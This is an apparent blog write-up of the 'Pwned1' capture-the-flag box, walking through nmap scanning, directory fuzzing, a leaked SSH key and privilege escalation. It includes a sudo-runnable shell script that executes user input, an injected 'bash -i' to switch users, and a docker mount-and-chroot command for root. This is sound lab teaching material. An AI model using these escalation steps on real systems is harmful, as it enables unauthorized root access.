Pwned1 Writeup

Written by Razor-Admin on 28 Feb 2021

Summary

Introduction
Scanning
Getting User
- User ariana
- User Selena
Privilage Escalation

Introduction

This is partical room from tryhackme entitled “Pwned1” form vulnhub. Difficulty of This box is Intermediate and in this box you will learn all about Fuzzing diretory, Custom exploitation, and getting privilage of root. Okay no let’s Pwn this box :p.

Scanning

As usual we will scan the ip of the box.

$ nmap -sV -sC 192.168.80.95  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 00:29 WIB
Nmap scan report for 192.168.80.95
Host is up (0.26s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE        VERSION
21/tcp  open     ftp            vsftpd 3.0.3
22/tcp  open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp  open     http           Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
777/tcp filtered multiling-http
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                              
Nmap done: 1 IP address (1 host up) scanned in 44.66 seconds

As you can see the box have 3 port open and 1 port filtered. Let’s take a look at web apache.

Nothing to see here but let’s take a look at robots.txt .

# Group 1

User-agent: *
Allow: /nothing
Allow: /hidden_text

There are have something interesting, i’m trying to fuzzing directory with gobuster in /hidden_text then i found secret.dic :

secret.dic : 

/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

So i’m trying to fuzz again and i found page in /pwned.vuln.

in this case i’m don’t do injection like sql but just take a look the source code and we found user ftp!.

Now i’m going to login ftpuser with password we found before.

Getting User

As you can see we found folder secret which contains id_rsa and note.txt :

id_rsa

note.txt :

Wow you are here 

ariana won't happy about this note 

sorry ariana :(

User ariana

You can see we did it so easyly. Now lets login with user credential .

Then let’s take a look at permission of the user ariana sudo -l.

ariana@pwned:/home$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

There is permission of ariana to execute bash of selena. Content of messenger.sh is :

#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name 
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

User Selena

Now we can getting user selena with put bash -i in messenger to selena.

Privilage Escalation

As you can see selena have permission with docker, then we can escaping from docker and getting a root with this command docker run -v /:/mnt --rm -it alpine chroot /mnt bash: